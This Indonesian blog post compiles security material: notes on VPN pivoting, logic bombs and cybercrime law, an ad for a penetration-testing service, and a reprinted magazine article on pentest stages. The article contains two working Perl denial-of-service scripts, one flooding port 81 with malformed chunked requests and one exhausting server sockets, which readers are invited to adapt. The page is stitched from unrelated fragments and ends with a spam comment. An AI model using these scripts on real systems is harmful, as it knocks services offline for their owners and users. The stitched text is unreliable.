·         VPN pivoting memungkinkan penyerang untuk membuat terowongan lapisan ke-2 yang terenkripsi ke dalam mesin yang dikuasai untuk mengarahkan lalu lintas jaringan apapun melalui mesin target itu, misalnya untuk menjalankan scan kerentanan pada jaringan internal melalui mesin yang dikuasai, secara efektif memberikan akses jaringan secara penuh kepada penyerang seolah-olah mereka berada di belakang firewall.
Biasanya, aplikasi proxy atau VPN yang memungkinkan pivoting, dijalankan pada komputer target sebagai payload (perangkat lunak) dari exploit.
Lihat pula
·         Backdoor
·         Keylogger
·         Rootkit
·         Spyware
·         Trojan horse
·         Virus komputer
·         Worm
·         Wabbit

Ø  LOGICAL BOMB

Kebutuhan akan teknologi Jaringan Komputer semakin meningkat. Selain sebagai media penyedia informasi, melalui Internet pula kegiatan komunitas komersial menjadi bagian terbesar, dan terpesat pertumbuhannya serta menembus  berbagai batas negara. Bahkan melalui jaringan ini kegiatan pasar di dunia bisa diketahui selama 24 jam. Melalui dunia internet atau disebut juga cyberspace, apapun dapat dilakukan. Segi positif dari dunia maya ini tentu saja menambah trend perkembangan teknologi dunia dengan segala bentuk kreatifitas manusia.  Namun dampak negatif pun tidak bisa dihindari. Tatkala pornografi marak di media Internet, masyarakat pun tak bisa berbuat banyak. Seiring dengan perkembangan teknologi Internet, menyebabkan munculnya kejahatan yang disebut dengan "CyberCrime" atau kejahatan melalui jaringan Internet. Munculnya beberapa kasus "CyberCrime" di Indonesia, seperti pencurian kartu kredit, hacking beberapa situs, menyadap transmisi data orang lain, misalnya email, dan memanipulasi data dengan cara menyiapkan perintah yang tidak dikehendaki ke dalam programmer komputer. Sehingga dalam kejahatan komputer dimungkinkan adanya delik formil dan delik materil. Delik formil adalah perbuatan seseorang yang memasuki komputer orang lain tanpa ijin, sedangkan delik materil adalah perbuatan yang menimbulkan akibat kerugian bagi orang lain. Adanya CyberCrime telah menjadi ancaman stabilitas, sehingga  pemerintah sulit mengimbangi teknik kejahatan yang dilakukan dengan teknologi komputer, khususnya jaringan internet dan intranet. Sebenarnya definisi untuk kejahatan komputer di Indonesia ini sudah tepat. Dalam satu kesempatan penulis sempat berbincang-bincang dengan unit reserse yang menangani kejahatan komputer. Definisinya adalah kejahatan komputer dan kejahatan yang berkaitan dengan komputer. Hal ini senada dengan
yang diungkapkan oleh Thomas Porter dalam bukunya “EDP Control and Auditing” yakni computer abuse (penyalahgunaan komputer), computer crime

Logic bomb merupakan program komputer untuk diaktifkan pada waktu tertentu. Logic bomb merupakan metode tertua yang digunakan untuk tujuan sabotase. Contoh kasus logic bomb ini adalah seperti yang dilakukan oleh Donald Burleson seorang programmer perusahaan asuransi di Amerika. Ia dipecat karena melakukan tindakan menyimpang. Dua hari kemudian sebuah logic bomb bekerja secara otomatis mengakibatkan kira-kira 160.000 catatan penting yang terdapat pada komputer perusahaan terhapus.

Kebocoran data merupakan metode pencurian atau pengambilan data secara tidak sah. Teknik yang digunakan mulai dari yang sederhana seperti mengambil data dengan media penyimpanan atau dengan teknik khusus seperti mencari kelemahan dalam sistem keamanan computer.

Contoh kasus kejahatan komputer di Indonesia.

Pertengahan tahun 2006 media massa memuat berita tentang perusakan situs  parpol besar di Indonesia. Berita tersebut cukup menyita perhatian pers. Media
 
Massa juga mengungkapkan Polri berhasil menangkap perusak situs parpol tersebut. Kejadian itu bukan merupakan kejadian pertama. Sebelumnya Polri  berhasil menangkap perusak situs KPU pada saat penghitungan hasil pemilu.

Sejak mulai ramai penggunaan internet di Indonesia, pada saat itu pula mulai merebak kejahatan komputer di internet atau yang lebih dikenal dengan istilah Cyber Crime. Kejahatan pertama yang berhasil diungkap adalah penggunaan kartu kredit orang lain untuk digunakan bertransaksi di internet. Kejahatan dengan menggunakan kartu kredit orang lain memang mudah dilakukan. Cukup mengetahui nama pemegang kartu, nomor kartu, dan tanggal kadaluwarsa. Selanjutnya tinggal pakai untuk transaksi. Pertanyaan yang muncul dari tertangkapnya pelaku cyber crime di atas adalah  pelanggaran apa yang dikenakan? Mereka dijerat dengan tuduhan penipuan atau  perusakan milik pemerintah. Dengan kata lain, sanksi konvensional karena Indonesia sampai saat ini belum memiliki undang-undang yang jelas tentang kejahatan komputer ini. Hal berbeda dengan negara-negara lain yang menganggap kejahatan komputer ini merupakan kejahatan yang serius. Amerika Serikat memiliki Computer Fraud and Abuse Act 1986 yang merupakan  peraturan kriminalitas komputer yang mencakup tindakan-tindakan seperti akses data ke komputer lembaga keuangan, pemerintah atau dengan negara lain dalam urusan komersial yang tidak sah. Penerobosan password juga dilarang. Tindakan kejahatan ditentukan dengan adanya kerusakan $1000 atau lebih pada perangkat lunak, pencurian barang, jasa atau uang atau akses tidak sah ke komputer medis tertentu. Denda berkisar $250.000 atau dua kali nilai data yang dicuri dan  pelanggar mendapat hukuman 1 sampai 5 tahun penjara. Contoh negara lainnya adalah Kanada, salah satu pasal kejahatan komputer adalah
Criminal code 301.2(1) : “penggunaan komputer secara tidak sah dikenakan
hukuman sampai 10 tahun untuk penggelapan penggunaan komputer atau
intersepsi terhadap fungsi komputer.” (George Bodnar, Accounting Information
System: 1995).


Ø  PENETRATION TESTING

Penetration testing atau sering disingkat menjadi pentest merupakan istilah untuk pengujian terhadap kehandalan suatu sistem dan mendokumentasikan tingkat keamanan aplikasi, sistem komputer, atau jaringan. Jika ditemukan kelemahan suatu sistem maka dengan segera akan dilakukan patch/penambalan sehingga keamanan sistem akan menjadi lebih kuat. Pentest dilakukan sesuai konteks hukum yang legal, dengan kontrak antara auditor/pentester dengan perusahaan yang ingin dilakukan pentest.
Target umum untuk penetrasi testing meliputi:
·         Layanan yang menggunakan internet (website, VPN endpoint, infrastruktur e-mail, extranet, dll)
·         Sistem internal atau servis yang ada di jaringan (Active Directory, Exchange, dll)
·         Aplikasi tertentu (dibeli atau dikembangkan sendiri oleh suatu perusahaan)
·         Jaringan internal
·         Karyawan perusahaan

TUJUAN TESTING

Tujuan dasar dari pentest adalah untuk mengidentifikasi adanya kelemahan keamanan dalam aplikasi, komputer, atau jaringan. Jika kelemahan dapat diidentifikasi dan dapat dibuktikan beserta dengan analisis resikonya, maka anda akan memiliki kemampuan dan waktu untuk memperbaikinya sebelum seseorang yang tidak berkepentingan mengambil keuntungan dari kelemahan tersebut.

Layanan Pentest Ethic Ninja
Kami menyediakan jasa pentest dengan 2 metode yaitu sebagai berikut :

1.         Blackbox Testing, yaitu melakukan penetrasi tanpa mengetahui apapun mengenai sistem yang anda gunakan selain domain aplikasi anda.
2.         Whitebox Testing, yaitu melakukan penetrasi dengan mengetahui informasi mengenai sistem dan logic yang anda gunakan, dimana kami akan mempelajari logic dari pemrograman aplikasi anda (Code review) sehingga menjadikan eksplorasi ditemukannya vulnerable/kelemahan lebih baik.
Kami membagi lagi ruang lingkup audit pentest sesuai tingkatan yang perusahaan anda butuhkan :

Level 1: General Vulnerability Scanning

Pada level ini kami mengumpulkan informasi sebanyak-banyaknya, mengidentifikasi semua kelemahan yang mungkin didapat dan mem-verifikasi kelemahan/vulnerability tersebut. Pada tingkatan ini kami akan memberikan kelemahan-kelemahan penting yang ditemukan selama proses assesment namun tidak sampai pada tahap penetrasi. Tingkatan ini cocok untuk customer yang memiliki kebutuhan hanya untuk melakukan cek keamanan secara global dan berulang/rutin.

Audit level 1 memiliki tahapan pengerjaan seperti berikut :
1.         Footprinting, mencari informasi sebanyak mungkin tentang target
2.         Port scanning
3.         Identifikasi dan enumerasi service
4.         Vulnerability scanning
5.         Social engineering
6.         Laporan komprehensif mengenai detail yang diperoleh dari tahapan-tahapan tersebut.

Level 2: Penetration Testing

Audit ini mencakup semua tahapan di level 1 ditambah beberapa proses lagi. Dari hasil yang diperoleh dari audit level 1, kami akan melakukan penetrasi guna membuktikan bahwa kelemahan tersebut valid dan kami berikan PoC (Proof of Concept). Keuntungan dari audit level 2 adalah customer akan mendapatkan informasi keamanan yang lebih rinci dan realistis.
Audit level 2 memiliki cakupan seperti berikut :
1.        Footprinting, mencari informasi sebanyak mungkin tentang target
2.        Port scanning
3.        Identifikasi dan enumerasi service
4.        Vulnerability scanning
5.        Penetration Testing
o    Vulnerability exploitation
o    CVSS Scoring (kalkulasi tingkat resiko yang dihasilkan dari kelemahan yang didapat)
6.        Social engineering
7.        Laporan komprehensif mengenai detail yang diperoleh dari tahapan-tahapan tersebut

Level 3: Full Penetration Testing

Audit ini mencakup semua tahapan di level 2 ditambah beberapa proses lagi pada bagian penetration testing. Dari hasil yang diperoleh dari audit level 2, akan dilakukan proses eksploitasi lebih lanjut. Keuntungan dari audit level 3 adalah audit ini dapat membantu memvalidasi security policy perusahaan anda.
Audit level 2 memiliki cakupan seperti berikut :
1.        Footprinting, mencari informasi sebanyak mungkin tentang target
2.        Port scanning
3.        Identifikasi dan enumerasi service
4.        Vulnerability scanning
5.        Penetration Testing
o    Vulnerability exploitation
o    Brute forcing
o    Password cracking
o    Privilege escalation
o    Gaining root
o    CVSS Scoring
6.        Social engineering
7.        Laporan komprehensif mengenai detail yang diperoleh dari tahapan-tahapan tersebut

Penetration Testing Vectors

Varian vektor keamanan yang akan diuji pada saat penetrasi adalah :
1.        SQLinjection
2.        XSS
3.        File Inclusion
4.        File upload
5.        Directory Traversal
6.        Access database found
7.        Access Admin Page found
8.        Apache exploit
9.        Application Error Message
10.    File Manager Script Exploit
11.    Code Execution
12.    Clickjacking
13.    CSRF Information Disclosure
14.    File Tampering
15.    Weak Password
16.    Host Header Attack
17.    Git Repository Found
18.    LDAP Injection
19.    PHPinfo Page Found
20.    Backup Data Found
21.                                                    
22.                  .;               .-.             
23.      .-.  .-.    ;;-. .-..-.      `-' . ,';.  .-. 
24.    .;.-' ;      ;;  ;;   ;' ;.   ;'   ;;  ;;.;.-' 
25.     `:::'`;;;;'.;`  ``;;'(   ;_.;:._.';  ;;  `:::'
26.                           `-'        ;    `.      
27.    ECHO MAGAZINE VOLUME IX, ISSUE XXIV, PHILE 0x0A.TXT
28.     
29.    New Comer Series: Introduction to Penetration Testing - _patusa.cyber_
30.    http://www.patusainside.wordpress.com
31.     
32.    -----[ Penetration Testing
33.     
34.    Sebelum terlalu jauh membahas tentang penetration testing, alangkah
35.    baiknya kita terlebih dahulu mengetahui tentang definisi dari
36.    penetration testing itu sendiri. Merujuk dari penjelasan yang diberikan
37.    wikipedia, penetration testing merupakan sebuah metode untuk
38.    meng-evakuasi keamanan sistem komputer melalui simulasi pennyerangan
39.    terhadap target dengan menggunakan malicious source (program jahat).
40.    Secara umum, proses penetration system banyak disamakan oleh para
41.    junior system administrator  dengan proses vulnerability system
42.    assessment.
43.     
44.    Kesalahan mindset tersebut menjadi suatu kesalahan fatal dalam
45.    pengelolaan keamanan sistem komputer. Vulnerability system assessment
46.    merupakan sebuah prosedur scanning terhadap vulnerabilities yang
47.    terdapat pada sistem dan melalukan filtering terhadap kelemahan
48.    tersebut untuk menghindari aksi eksploitasi oleh hacker. Hal ini jelas
49.    hampir mirip dengan pengertian harfiah dari penetration testing yang
50.    mana proses pencarian terhadap vulnerabilities (kelemahan) dan
51.    melakukan eksploitasi terhadap sistem tersebut hingga tester mengetahui
52.    titik lemah sebenarnya dari sistem tersebut. 
53.     
54.    Alasan umum tentang mengapa system administrator WAJIB melakukan
55.    penetration testing terhadap systemnya sendiri antara lain untuk
56.    menemukan titik kelemahan dan vulnerabilities system sebelum titik
57.    kelemahan tersebut dieksploitasi oleh hacker, memberikan gambaran bahwa
58.    manajemen terhadap system keamanan komputer merupakan sebuah hal
59.    keharusan yang harus dilakukan, menguji coba terhadap mekanisme
60.    firewal/alur keamanan sistem dan meng-evaluasi apakah sistem yang
61.    digunakan sudah memenuhi standar keamanan sistem komputer (walaupun
62.    sampai saat ini saya sendiri tidak mengetahui tolak ukur sebenarnya apa
63.    yang dikatakan sistem yang aman), melakukan tracing terhadap kesalahan
64.    internal (kesalahan penerapan algoritma keamanan komputer/rule hak
65.    akses) dan bagaimana mempermudah system administrator dalam mengelola
66.    management log jika terjadi insiden penyerangan pada sistem (dalam hal
67.    ini erat kaitannya dengan digital forensic). 
68.     
69.    Merujuk pada paper OSSTMM (December 13, 2006), dijabarkan mengenai
70.    teori pengimplementasian sistem keamanan komputer yang dinilai cukup
71.    aman untuk meminimalisir tingkat kecelahan keamanan terhadap server.
72.    Beberapa metode keamanan komputer yang dapat implementasikan pada
73.    sistem antara lain :
74.     
75.    Internet Gateway and Service
76.     
77.    - Jangan pernah menggunakan remote akses yang tidak terenkripsi
78.    - Jangan pernah menggunakan remote akses yang tidak terautentifikasi
79.    - Lakukan pembatasan akses yang diperboleh baik itu diijinkan ataupun
80.      ditolak secara spesifik
81.    - Lakukan monitoring secara berkala dan lakukan pencatatan log
82.    - Desentralisasi
83.    - Batasi antara koneksi sistem yang tidak terpercaya
84.    - Lakukan proses "penyeleksian" terhadap inputan yang diterima server
85.      dan lakukan validasi terlebih dahulu
86.    - Lakukan installasi program yang sesuai dengan kebutuhan
87.    - Selalu usahakan server berada pada status "invisible" User
88.    - Desentralisasi autorisasi
89.    - Hak akses terhadap sistem hanya dapat dilakukan pada jaringan
90.      internal
91.    - Membatasi informasi yang diberikan kepada user mengenai teknologi
92.      infrastruktur dan Informasi Server
93.     
94.    Secara umum, tidak adan aturan baku yang benar-benar mengatur tentang
95.    proses penetrasi terhadap server. Tingkat keberhasilan proses penetrasi
96.    terhadap server sendiri ditentukan dari tingkat kekreativitasan tester
97.    untuk berpikir mencari jalan terbaik dan terefektif untuk memperoleh
98.    hasil seakurat mungkin terhadap kelemahan server. merujuk pada
99.    refferensi "Professional Penetration Testing", dikemukakan beberapa
100.tahapan yang "umum" dilakukan oleh tester untuk mencari kelemahan dari
101.server
102. 
103.1. Information Gathering
104.   Information Gathering difokuskan untuk dapat mengumpulkan informasi
105.   secukupnya mengenai sistem target. proses pengumpulan informasi
106.   sendiri terbagi menjadi dua, yaitu passive information gathering dan
107.   active information gathering. pengumpulan informasi menggunakan
108.   teknik passive information gathering dapat menggunakan service
109.   WHOIS, DNS, Search Engine (Google), Website Analisis Security
110.   (netcraft) dan tools seperti Maltego, metagofil dan tracerout.
111.   Sedangkan untuk prosedur active information gathering biasanya
112.   hacker menggunakan teknik Port Scanning, Banner Grab,
113.   Fingerprinting, Network Mapping dan ARP Poisoning
114. 
115.2. Vulnerability Scanning
116.   Langkah ini merupakan lanjutan dari proses Information Gathering,
117.   tujuan melakukan proses ini untuk mengidentifikasi kelemahan yang
118.   kemungkinan dapat dimanfaatkan untuk proses eksploitasi.
119.   Vulnerability Scanning dapat menggunakan Database-database
120.   vulnerabilites website seperti: CVE Database, SecurityFocus, Milis
121.   Bugtraq, Inesecure, cve.mitre.org, xforce.iss.net,
122.   packetstormsecurity.org, kb.cert.org/vuls.
123.  
124.   Selain menggunakan database vulnerabilites website, penggunaan tools
125.   dalam hal vulnerability Scanning juga dapat dilakukan dengan
126.   menggunakan software seperti: Nessus, Qualys, Fuzzing (Vunelrability
127.   Scanning Web Based), Nikto (Vunelrability Scanning Web Based), dan
128.   WebInspect (Vunelrability Scanning Web Based). 
129. 
130.3. Penetration Testing
131.   Tahapan ini merupakan tahapan yang paling ditunggu-tunggu oleh para
132.   hacker, tujuan dari tahapan ini adalah eksploitasi terhadap
133.   kelemahan system (vulnerabilities system) yang sudah didapatkan pada
134.   tahapan sebelumnya. tahapan dalam penetration testing antara lain
135.   gaining access,Escalate Privilage, Maintain Access, Clean Up.
136.  
137.   Proses gaining access (penetrasi) dapat menggunakan beberapa cara,
138.   antara lain dengan penggunaan Metasploit. Untuk proses Escalate
139.   Privilege merupakan sebuah proses untuk peningkatan hak akses yang
140.   sudah didapatkan oleh hacker. teknik yang biasanya dilakukan antara
141.   lain  crack admin/crack password, brute-force dan rainbow tables.
142.  
143.   Langkah selanjutnya yang harus dilakukan apabila sudah mendapatkan
144.   hak akses adalah dengan menjaga hak akses tersebut agar kita tetap
145.   bisa masuk ke dalam sistem tanpa bersusah payah seperti di awal
146.   (Maintain Access), salah satu metode yang sering digunakan antara
147.   lain rootkits dan trojans. langkah terakhir yang harus dilakukan
148.   oleh hacker setelah mendapatkan seluruh informasi yang dia butuhkan
149.   adalah dengan menghilangkan semua jejak yang tertinggal dalam
150.   sistem. 
151.  
152.   Salah satu item penetration testing yang dapat digunakan untuk
153.   menguji tentang ketahanan dan kekuatan server dapat menggunakan
154.   teknik DoS, DoS merupakan sebuah proses yang difokuskan untuk
155.   menghabiskan resource yang terdapat pada sistem target. varian
156.   terbaru dari serang DoS adalah DDoS, DDoS adalah sebuah serangan
157.   flodding yang menggunakan puluhan hingga ribuan zombie (victim
158.   komputer yang sudah diinfeksi terlebih dahulu) yang bertujuan untuk
159.   menghabiskan resource dari sebuah server.
160.  
161.   Serangan DoS sendiri terbagi menjadi beberapa jenis  antara lain
162.   yang cukup terkenal adalah  Smurf, Fraggle, SYN Flood, Teardrop dan
163.   Ping Of Death. berikut ini saya lampirkan beberapa script DoS yang
164.   saya gunakan untuk melakukan penetration test terhadap server lokal
165.   yang pernah saya gunakan (Shoutz and Tribute to MOBY dan Y3DIPS).
166.   saya hanya menyesuaikan dengan kondisi jaringan yang saya gunakan.
167.   Bagi yang ingin menggunakannya harap teliti untuk mengganti beberapa
168.   settingan di dalam script tersebut ServiceAttack.pl (sebuah script
169.   Dos yang langsung melakukan serangan kepada service port 81)
170.  
171.--------------------- ServiceAttack.pl -----------------  
172.   #!/usr/bin/perl -w
173. 
174.    use IO::Socket;
175. 
176.        printf"\n***********************************************************************\n";
177. 
178.                   print "  * Script perl disini digunakan untuk melakukan serangan D.O.S       *\n";
179.                   print "  * thanks to modified, tested and credit for y3dips, new inspiration *\n";
180.                   print "  *          based on <Luis Wong> lwong [at]mpsnet.net.mx             *\n";
181.                   print "  *      greetz to echostaff a.k.a the_day, moby, comex, all crew     *\n";
182.                   printf"  ***********************************************************************\n\n";
183. 
184.    if(@ARGV == 1){
185.                                  my $host = $ARGV[0];
186.                                  my $i;
187.                                  while(){
188.                   $sock = IO::Socket::INET->new(PeerAddr => $host,
189.                                                       PeerPort => "81",
190.                                                       Proto => 'tcp');
191.                   unless($sock){
192.                   die "  kalo masih ngak bisa, check portnya atau ditolak ama si target server!.";
193.                   }
194.                   $sock->autoflush(1);
195.                   print $sock "POST /eCHo.htm HTTP/1.1\nHost: $host\nTransfer-Encoding:
196.                   chunked\n\n90000000\n\n";
197.                   while ( <$sock> ){
198.                   print;
199.                   }
200. 
201.                   close $sock;
202.                                  $i++;
203.                   print ".";
204.                                  }
205.                   }else{
206. 
207.                   print "           [GUnakan] ...   ./$0 'HosT'      <<  untuk linux \n"  ;
208.                   print "           [Gunakan] ...   perl $0 'Host'   <<untuk windows  \n";
209.    } 
210.-------------------- ServiceAttack.pl --------------------
211. 
212.    gantungscoket.pl (Script ini bertujuan untuk menyerang langsung socket dari server)
213.   
214.-------------------- gantungsocket.pl --------------------   
215.    #!/usr/bin/perl
216.
217.    use IO::Socket;
218. 
219.    if (!$ARGV[1]) {
220. 
221.                   print "Cara Menggunakanna: perl gantungsocket.pl [host] [port] \n";
222.                   exit;
223. 
224.                   }
225.    for (1..1300) {
226.                   $fh{$_}=new IO::Socket::INET
227.                                   PeerAddr=> "$ARGV[0]",
228.                                  PeerPort=> "$ARGV[1]",
229.                                  Proto => "tcp"
230.    or die; print "$_\n"
231. 
232.    }
233.    # Thx to MOBY for your based code
234.-------------------- gantungsocket.pl ---------------------
235. 
236. 
237.4.  Analisis terhadap proses pentest
238.    Setelah mendapatkan hasil yang cukup memuaskan, salah satu tugas
239.    terpenting dari seorang tester adalah melakukan analisis terhadap
240.    permasalahan dan vulnerabities yang sudah berhasil di eksploitasi
241.    sehingga menemukan sebuah solusi/jalan keluar untuk menangani
242.    permasalahan tersebut.
243. 
244.5. Documentation
245.    Proses ini merupakan langkah terakhir dari proses Pentest. Intisari
246.    dari dokumentasi penetration testing ialah untuk mengklasifikasikan
247.    vulnerabilities tersebut berada pada posisi mana apakah tergolong
248.    beresiko tinggi, beresiko menengah, ataupun tidak beresiko sama
249.    sekali
250. 
251. 
252.-----[ Link Bermanfaat
253. 
254.Untuk melakukan simulasi tentang proses penetrasi alangkah baiknya
255.junior administrator dapat bermain-main terlebih dahulu dengan beberapa
256.tools dibawah ini, antara lain
257.   
258.    1. Backtrack
259.    2. Nmap (http://www.insecure.org/nmap/)
260.    3. Nessus (http://www.nessus.org/)
261.    4. Metasploit (http://metasploit.org/)
262.    5. WebScarab
263.    6. Wireshark
264.    7. Immunity Canvas (http://www.immunitysec.com/index.shtml)
265.    8. IP Scanner (http://www.topshareware.com/IPScanner-download-11457.htm)
266.    9. ISS Internet Scanner (http://www.iss.net)
267.    10. CSS Cisco Security Scanner (http://www.cisco.com)
268.    11. N-Stealth Scanner (http://www.nstalker.com/eng/products/nstealth)
269.    12. SuperScan 4.0 (http://www.scanwith.com/download/SuperScan.htm)
270. 
271.setelah cukup familiar dengan beberapa tools tersebut tidak ada
272.salahnya untuk mencoba melakukannya dalam sebuah simulasi, perlengkapan
273.yang mungkin dibutuhkan antara lain De-ICE Pentest Disc, Metasploit
274.Unleashed, WebGoat, HackThisSite, Hax.tor.hu,
275.   
276.Selain beberapa refferensi yang sudah saya berikan diatas, informasi
277.tentang tools untuk melakukan penetrasi juga dapat ditemukan pada site
278.dibawah ini,
279. 
280.1. http://www.frozentech.com/content/livecd.php
281.   Live CD bootable linux dengan tools yang dilengkapi dengan tools untuk
282.   penetration testing
283. 
284.2. http://www.remote-exploit.org
285.   Situs yang menjadi "kandang" hacking, salah satu produk terkenal yang
286.   disediakan remote exploit adalah backtrack
287. 
288.3. http://examples.oreilly.com/networksa/tools/ situs ini
289.   berisi kira-kira 100 buah tools yang digunakan untuk penetration
290.   testing
291. 
292.Beberapa website yang menyediakan database tentang vulnerabilities
293.system antara lain :
294.1. Milworm (http://www.milw0rm.com) *down
295.2. Metasploit (http://www.metasploit.com)
296.3. Security Focus (http://www.securityfocus.com)
297.4. Packet Storm Security (http://www.packetstormsecurity.org)
298. 
299.-----[ Referensi
300. 
301.[x] Thomas, Wilhelm. Professional Penetration Testing. Rockland:
302.    Syngress Publishing Inc, 2010
303.[x] http://www.bitsecglobalforensics.com/netdefense.co.uk
304.[x] Paper OSSTMM  2.2. (Open-Source Security Testing Methodology Manual)
305. 
306.-----[ Shoutz
307.Allah SWT Beserta Nabi Muhammad SAW
308.MOBY - thanks atas script DOS nya yang masih bisa digunakan (Salam
309.       Sanak Sakampuang) :D
310.Y3DIPS
311.EchoStaff||
312._Cheppy_





Sumber:

1 komentar:

  1. 3D-Titanium Bmx Frame - TITanium-Arts
    3D-Titanium titanium wood stove Bmx Frame is a grade 23 titanium new piece titanium jewelry piercing of custom frame concept for the titanium trim hair cutter Sega Genesis. This ridge titanium wallet new piece of custom frame concept allows you to customise your

    BalasHapus